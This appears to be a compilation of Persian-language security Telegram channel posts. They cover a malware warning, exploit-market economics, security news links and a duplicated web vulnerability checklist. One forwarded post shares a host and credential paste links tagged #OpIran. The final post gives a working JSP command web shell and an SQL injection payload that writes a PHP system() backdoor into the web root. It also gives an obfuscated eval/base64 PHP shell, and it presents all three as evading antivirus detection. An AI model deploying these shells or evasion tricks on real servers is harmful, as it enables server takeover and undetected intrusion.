Forwarded from بیخوف؛ امنیت در دنیای دیجیتال
مراقب باشید!
بدافزاری در فیسبوک منتشر شده که از طریق کلیک کردن روی لینک "فیلم روابط بازیگران"، نصب میشود!
بیشتر بخوانید 👈
http://bit.ly/2gQQbBM
— — —
🔐 @Bikhof
بدافزاری در فیسبوک منتشر شده که از طریق کلیک کردن روی لینک "فیلم روابط بازیگران"، نصب میشود!
بیشتر بخوانید 👈
http://bit.ly/2gQQbBM
— — —
🔐 @Bikhof
Forwarded from ناویا، ماشین کاوش اپلای
اقتصادسنجی در پروژههای نفوذ (امنیت سایبری)
و کشف آسیبپذیری،
یکی از مشکلاتی ست که تمامی اقشار
(چه مدیران، چه دلالان و چه هکرهایی که عمل اصلی به دوش آنهاست)،
مخصوصاً در ایران،
از هنگامی که حیطهی نفوذ و امنیت سایبری
بطور چشمگیری به میان آمده،
دامنگیرشان بوده است.
تابحال تحقیقاتی (هرچند کم) در زمینهی مقیاسپذیری
و ارزشگذاریِ افشای آسیبپذیریهای نرمافزاری
و قیمتگذاری امنیت سایبری/اطلاعات صورت گرفته
که هرکدام به نسبت خود،
به ایجاد بستری از طرف فروشندگان (Vendors)
توسط جایزه (Bounty) گذاشتن، فراخوانها
و برقراری واحد تحقیق و توسعهی امنیت
پیشنهاد کرده بودند.
از منظرگاه پژوهشگران امنیت در سطح جهانی،
دریافت چند هزار دلار
بابت یک پروژهی تحقیقاتی/عملیاتی صرف چند روز
(بعنوان یک بستر چالشزا و درگیری با راهکارهای نو)
میتواند نقطهی مطلوبی به نظر آید.
در نقطه مقابل، بستری تحت عنوان «بازار سیاه»
برای آسیبپذیریهایی که اکسپلویتپذیری آنها
از لحاظ قابلیت اعتماد (Reliability) و
میزان پایداری (Stability) مطلوبی برخوردار باشد، وجود داشته و دارد.
که البته در این میان،
سهم دلالان از سهم هکرها بسته به روابطی که دارند،
میتواند بیشتر باشد.
بعنوان یک دلال،
این اکسپلویتها، نه بعنوان یک آسیبپذیری بالقوه،
که به دلیل میزان سادگی، پایداری
و قابلیت اعتماد از اکسپلویتشوندگی آن است
که به فروش میرسد و ارزشگذاری خواهد شد.
همین امر باعث شده تا متر و معیار مهاجمین
و هکرهایی که بدنبال کسب درآمد هستند،
بدون نگاه درست، همان مقیاس و ارزشگذاریهای دلالان باشد و
چه از این بهتر که پیشنهاد دلال
۱۰ برابر پیشنهاد یک مهاجم باشد؟
هرچند با این دیدگاه موارد بالا توضیح داده شد که
به قیمت نهایی از آسیبپذیری تا اکسپلویت آن
بسته به نوع هر آسیبپذیری، که میتواند سطحی (خطاهای منطقی و طراحی)
و پیشرفته (بسیاری از روشهای تخریب حافظه) باشد، پرداخته نشده است.
اما نکتهی قابل توجه اینجاست که معمولاً صاحبان محصولات،
به این موضوع اهمیت نمیدهند که
شما یک اکسپلویت قابل اعتماد بنویسید یا خیر.
بلکه آسیبپذیریای میخواهند که تنها بتوانند آنرا رفع کنند.
اینکه یاد بگیرند و راهکاری وجود داشته باشد که
این موضوع دیگر اتفاق نیفتد!
مگر اینکه واقعاً ابزارها و سیاستهای پیشرفتهای (مثل Sandboxها) بکار رفته باشد.
همین امر باعث شده تا میانگین قیمت نهایی اکسپلویتها
به حدی نباشد که زمان/خلاقیت در آن بکار رفته است.
گروه پژوهشی آفسک در تلاش است
تا با بکارگیری از توان و استعدادهای این زمینه
به فرهنگسازی و رشد معیارهای کیفی نسبت به توان هر فرد، گام بردارد.
@offsecmag
و کشف آسیبپذیری،
یکی از مشکلاتی ست که تمامی اقشار
(چه مدیران، چه دلالان و چه هکرهایی که عمل اصلی به دوش آنهاست)،
مخصوصاً در ایران،
از هنگامی که حیطهی نفوذ و امنیت سایبری
بطور چشمگیری به میان آمده،
دامنگیرشان بوده است.
تابحال تحقیقاتی (هرچند کم) در زمینهی مقیاسپذیری
و ارزشگذاریِ افشای آسیبپذیریهای نرمافزاری
و قیمتگذاری امنیت سایبری/اطلاعات صورت گرفته
که هرکدام به نسبت خود،
به ایجاد بستری از طرف فروشندگان (Vendors)
توسط جایزه (Bounty) گذاشتن، فراخوانها
و برقراری واحد تحقیق و توسعهی امنیت
پیشنهاد کرده بودند.
از منظرگاه پژوهشگران امنیت در سطح جهانی،
دریافت چند هزار دلار
بابت یک پروژهی تحقیقاتی/عملیاتی صرف چند روز
(بعنوان یک بستر چالشزا و درگیری با راهکارهای نو)
میتواند نقطهی مطلوبی به نظر آید.
در نقطه مقابل، بستری تحت عنوان «بازار سیاه»
برای آسیبپذیریهایی که اکسپلویتپذیری آنها
از لحاظ قابلیت اعتماد (Reliability) و
میزان پایداری (Stability) مطلوبی برخوردار باشد، وجود داشته و دارد.
که البته در این میان،
سهم دلالان از سهم هکرها بسته به روابطی که دارند،
میتواند بیشتر باشد.
بعنوان یک دلال،
این اکسپلویتها، نه بعنوان یک آسیبپذیری بالقوه،
که به دلیل میزان سادگی، پایداری
و قابلیت اعتماد از اکسپلویتشوندگی آن است
که به فروش میرسد و ارزشگذاری خواهد شد.
همین امر باعث شده تا متر و معیار مهاجمین
و هکرهایی که بدنبال کسب درآمد هستند،
بدون نگاه درست، همان مقیاس و ارزشگذاریهای دلالان باشد و
چه از این بهتر که پیشنهاد دلال
۱۰ برابر پیشنهاد یک مهاجم باشد؟
هرچند با این دیدگاه موارد بالا توضیح داده شد که
به قیمت نهایی از آسیبپذیری تا اکسپلویت آن
بسته به نوع هر آسیبپذیری، که میتواند سطحی (خطاهای منطقی و طراحی)
و پیشرفته (بسیاری از روشهای تخریب حافظه) باشد، پرداخته نشده است.
اما نکتهی قابل توجه اینجاست که معمولاً صاحبان محصولات،
به این موضوع اهمیت نمیدهند که
شما یک اکسپلویت قابل اعتماد بنویسید یا خیر.
بلکه آسیبپذیریای میخواهند که تنها بتوانند آنرا رفع کنند.
اینکه یاد بگیرند و راهکاری وجود داشته باشد که
این موضوع دیگر اتفاق نیفتد!
مگر اینکه واقعاً ابزارها و سیاستهای پیشرفتهای (مثل Sandboxها) بکار رفته باشد.
همین امر باعث شده تا میانگین قیمت نهایی اکسپلویتها
به حدی نباشد که زمان/خلاقیت در آن بکار رفته است.
گروه پژوهشی آفسک در تلاش است
تا با بکارگیری از توان و استعدادهای این زمینه
به فرهنگسازی و رشد معیارهای کیفی نسبت به توان هر فرد، گام بردارد.
@offsecmag
Forwarded from canyoupwn.me
Malicious #Cryptocurrency Mining tool turns Computers into #Zcash Mining Machines
http://thehackernews.com/2016/12/zcash-cryptocurrency-miner.html
http://thehackernews.com/2016/12/zcash-cryptocurrency-miner.html
The Hacker News
Malicious Cryptocurrency Mining tool turns Computers into Zcash Mining Machines
Arbitary File Deletion
Code Execution
Cookie Manipulation ( meta http-equiv & crlf injection )
CRLF Injection ( HTTP response splitting )
Cross Frame Scripting ( XFS )
Cross-Site Scripting ( XSS )
Directory traversal
Email Injection
File inclusion
Full path disclosure
LDAP Injection
PHP code injection
PHP curl_exec() url is controlled by user
PHP invalid data type error message
PHP preg_replace used on user input
PHP unserialize() used on user input
Remote XSL inclusion
Script source code disclosure
Server-Side Includes (SSI) Injection
SQL injection
URL redirection
XPath Injection vulnerability
EXIF
Blind SQL injection (timing)
Blind SQL/XPath injection (many types)
8.3 DOS filename source code disclosure
Search for Backup files
Cross Site Scripting in URI
PHP super-globals-overwrite
Script errors such as the Microsoft IIS Cookie Variable Information Disclosure
Cross Site Scripting in path
Cross Site Scripting in Referer
Directory permissions ( mostly for IIS )
HTTP Verb Tampering ( HTTP Verb POST HTTP Verb WVS )
* Possible sensitive files
* Possible sensitive files
* Session fixation ( jsessionid PHPSESSID session fixation )
Vulnerabilities ( e.g. Apache Tomcat Directory Traversal, ASP.NET error message etc )
WebDAV ( very vulnerable component of IIS servers )
Application error message
Check for common files
Directory Listing
Email address found
Local path disclosure
Possible sensitive files
Microsoft Office possible sensitive information
Possible internal IP address disclosure
Possible server path disclosure ( Unix and Windows )
Possible username or password disclosure
Sensitive data not encrypted
Source code disclosure
Trojan shell ( r57,c99,crystal shell etc )
( IF ANY )Wordpress database credentials disclosure
Unrestricted File Upload
Microsoft IIS WebDAV Authentication Bypass
SQL injection in the authentication header
Weak Password
GHDB – Google hacking database ( using dorks to find what google crawlers have found like passwords etc )
Application Error Message ( testing with empty, NULL, negative, big hex etc )
Code Execution
SQL Injection
XPath Injection
Blind SQL/XPath injection ( test for numeric,string,number inputs etc )
Stored Cross-Site Scripting ( XSS )
Cross-Site Request Forgery ( CSRF
Code Execution
Cookie Manipulation ( meta http-equiv & crlf injection )
CRLF Injection ( HTTP response splitting )
Cross Frame Scripting ( XFS )
Cross-Site Scripting ( XSS )
Directory traversal
Email Injection
File inclusion
Full path disclosure
LDAP Injection
PHP code injection
PHP curl_exec() url is controlled by user
PHP invalid data type error message
PHP preg_replace used on user input
PHP unserialize() used on user input
Remote XSL inclusion
Script source code disclosure
Server-Side Includes (SSI) Injection
SQL injection
URL redirection
XPath Injection vulnerability
EXIF
Blind SQL injection (timing)
Blind SQL/XPath injection (many types)
8.3 DOS filename source code disclosure
Search for Backup files
Cross Site Scripting in URI
PHP super-globals-overwrite
Script errors such as the Microsoft IIS Cookie Variable Information Disclosure
Cross Site Scripting in path
Cross Site Scripting in Referer
Directory permissions ( mostly for IIS )
HTTP Verb Tampering ( HTTP Verb POST HTTP Verb WVS )
* Possible sensitive files
* Possible sensitive files
* Session fixation ( jsessionid PHPSESSID session fixation )
Vulnerabilities ( e.g. Apache Tomcat Directory Traversal, ASP.NET error message etc )
WebDAV ( very vulnerable component of IIS servers )
Application error message
Check for common files
Directory Listing
Email address found
Local path disclosure
Possible sensitive files
Microsoft Office possible sensitive information
Possible internal IP address disclosure
Possible server path disclosure ( Unix and Windows )
Possible username or password disclosure
Sensitive data not encrypted
Source code disclosure
Trojan shell ( r57,c99,crystal shell etc )
( IF ANY )Wordpress database credentials disclosure
Unrestricted File Upload
Microsoft IIS WebDAV Authentication Bypass
SQL injection in the authentication header
Weak Password
GHDB – Google hacking database ( using dorks to find what google crawlers have found like passwords etc )
Application Error Message ( testing with empty, NULL, negative, big hex etc )
Code Execution
SQL Injection
XPath Injection
Blind SQL/XPath injection ( test for numeric,string,number inputs etc )
Stored Cross-Site Scripting ( XSS )
Cross-Site Request Forgery ( CSRF
#Tor blocked in Turkey as government cracks down on VPN use
https://turkeyblocks.org/2016/12/18/tor-blocked-in-turkey-vpn-ban/
https://turkeyblocks.org/2016/12/18/tor-blocked-in-turkey-vpn-ban/
Turkey Blocks
Tor blocked in Turkey as government cracks down on VPN use - Turkey Blocks
The Turkey Blocks internet censorship watchdog has identified and verified that restrictions on the Tor anonymity network and Tor Browser are now in effect throughout Turkey. Our study indicates that service providers have successfully complied with a government…
iOS 10.1.1 Kernel & Root Exploit by Project Zero Team RELEASED !
https://m.reddit.com/r/jailbreak/comments/5iiyo1/discussion_ios_1011_kernel_root_exploit_by/
https://youtu.be/MeqbzfKi7WY
https://m.reddit.com/r/jailbreak/comments/5iiyo1/discussion_ios_1011_kernel_root_exploit_by/
https://youtu.be/MeqbzfKi7WY
YouTube
Ian Beer's iOS 10.1.1 Exploit Demo and Detection
Last week, Ian Beer, from the Google Project Zero research team, released his local elevation of privileges exploit targeting iOS 10.1.1. We took it upon our...
Forwarded from Israel_zurael_sTz
download.freeleecher.ir:555
user : https://ghostbin.com/paste/krbqh
5 ports http://pastebin.com/kVLxN7HU
@HackRead #Oplslam #Opiran #iran #freeleecher
user : https://ghostbin.com/paste/krbqh
5 ports http://pastebin.com/kVLxN7HU
@HackRead #Oplslam #Opiran #iran #freeleecher
Pastebin
download.freeleecher.ir:555 | user... | #ICA - Pastebin.com
Forwarded from ناویا، ماشین کاوش اپلای
وبشلها ابزار مدیریت و Post Exploitation مهاجمین تحت وب است. آنها میتوانند با وبشل بسیار سریعتر و بهینهتر به اجزای سرورها دسترسی داشته و عملیات خود را انجام دهند.
همانطور که میدانید وبشلها تغییر چندانی در ماهیت خود از چند سال پیش نداشتهاند، اما به مرور سیاستهای جلوگیری از تشخیص در آنها بهکار گرفته شده است.
۱. استفاده از فناوری JSP در کنار استفاده از فناوریهای Web2:
که هماکنون نیز مشاهده میکنید (goo.gl/PE6ZC0) میزان شناخت این وبشل توسط ضدویروسها ۲ از ۵۴ بوده است.
۲. استفاده از توابع خطرناک در میانهی کدها و عملیات روتین تحت وب:
که بدیهی است یک دستور SQL به جهت جا انداختن یک پشتدری (Backdoor) درون یک فایل میباشد. البته برای این مورد مهاجم باید یک آسیبپذیری SQL Injection یافت کند.
میزان شناخت این مورد توسط ضدویروسها، صفر از ۵۴ بوده است!
۳. یکی از مزایای مبهمسازی (Obfuscation) کدها برای حملات تحت وب، استفاده از الگوریتمها و ترکیبات ناشناختهی آن جهت مقابله با IDS/IPS ها، ضدویروسها، Firewallها و دیگر ابزارهای شناخت وبشل است. در این مورد قصد داریم یک الگوریتم ترکیبی را به شما نمایش دهیم تا درک کنید چقدر دورزدن ضدویروسها میتواند آسان باشد:
این قسمتی از یک وبشل مبهمسازیشده توسط ابزار رایگان و آنلاین FOPO میباشد که میزان شناخت آن توسط ضدویرسها صفر از ۵۴ بوده است! (goo.gl/9JznXu)
ممکن است در نگاه اول کمی عجیب بوده باشد اما محتوای شفاف آن به شکل زیر است:
تنها تفاوت آن با دیگر ابزارهای مبهمسازی این است که رشتهی “base64_decode” را چطور رمزگذاری (Encode) میکند.
نمونههایی از آن به این صورت است:
توجه میکنید که هر کدام از مقادیر یک ترکیب متفاوت از مقادیر Hex و Octal دیگری است! به همین سادگی.
در پستهای آینده انشاالله با روشهای شناخت و جلوگیری بهینه و مدرن این سری از عملیات آشنا خواهید شد.
گروه پژوهشی آفسک
@offsecmag
همانطور که میدانید وبشلها تغییر چندانی در ماهیت خود از چند سال پیش نداشتهاند، اما به مرور سیاستهای جلوگیری از تشخیص در آنها بهکار گرفته شده است.
۱. استفاده از فناوری JSP در کنار استفاده از فناوریهای Web2:
<%@ page import="java.util.*,java.io.*"%>
<html>
<body>
<form method="GET" name="offsec.ir" action="">
<input type="text" name="cmd">
<input type="submit" value="Send">
</form>
<pre>
<%
if (request.getParameter("cmd") != null) { out.println("Command: " + request.getParameter("cmd") + "<br>"); Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null )
{out.println(disr);
disr = dis.readLine();
}
}
%>
</pre>
</body>
</html>
که هماکنون نیز مشاهده میکنید (goo.gl/PE6ZC0) میزان شناخت این وبشل توسط ضدویروسها ۲ از ۵۴ بوده است.
۲. استفاده از توابع خطرناک در میانهی کدها و عملیات روتین تحت وب:
UNION SELECT NULL,"<? system($_REQUEST['cmd']); ?>", NULL INTO OUTFILE "/var/www/offsec.ir/webshell.php" —
که بدیهی است یک دستور SQL به جهت جا انداختن یک پشتدری (Backdoor) درون یک فایل میباشد. البته برای این مورد مهاجم باید یک آسیبپذیری SQL Injection یافت کند.
میزان شناخت این مورد توسط ضدویروسها، صفر از ۵۴ بوده است!
۳. یکی از مزایای مبهمسازی (Obfuscation) کدها برای حملات تحت وب، استفاده از الگوریتمها و ترکیبات ناشناختهی آن جهت مقابله با IDS/IPS ها، ضدویروسها، Firewallها و دیگر ابزارهای شناخت وبشل است. در این مورد قصد داریم یک الگوریتم ترکیبی را به شما نمایش دهیم تا درک کنید چقدر دورزدن ضدویروسها میتواند آسان باشد:
<?php
/*
@offscmag – offsec.ir
Obfuscation provided by FOPO - Free Online PHP Obfuscator
Checksum: e5a931bb23bbcc2dbf286decc8e2b2b72a7d9b0b
*/ $g2a594c0="\x62\x61\163\145\66\64\137\144\145\143\157\144\145";@eval($g2a594c0( "Ly9Oc044UThBMCtXVVJ6NytPQ2VkU0lGeFczNEwrR1NZVlJnZHN5M1pKK01mSXRJUkRYeU1OOGR2RX
این قسمتی از یک وبشل مبهمسازیشده توسط ابزار رایگان و آنلاین FOPO میباشد که میزان شناخت آن توسط ضدویرسها صفر از ۵۴ بوده است! (goo.gl/9JznXu)
ممکن است در نگاه اول کمی عجیب بوده باشد اما محتوای شفاف آن به شکل زیر است:
$g2a594c0=”base64_decode”;
@eval($g2a594c0(“…”);
تنها تفاوت آن با دیگر ابزارهای مبهمسازی این است که رشتهی “base64_decode” را چطور رمزگذاری (Encode) میکند.
نمونههایی از آن به این صورت است:
$ueafa759="\x62\141\163\x65\66\64\x5f\x64\x65\143\x6f\x64\145";
$c03a9f9c="\142\141\163\145\x36\64\x5f\x64\x65\x63\157\x64\x65";
$p44aaf5f="\x62\141\163\145\66\64\x5f\x64\145\143\x6f\x64\x65";
توجه میکنید که هر کدام از مقادیر یک ترکیب متفاوت از مقادیر Hex و Octal دیگری است! به همین سادگی.
در پستهای آینده انشاالله با روشهای شناخت و جلوگیری بهینه و مدرن این سری از عملیات آشنا خواهید شد.
گروه پژوهشی آفسک
@offsecmag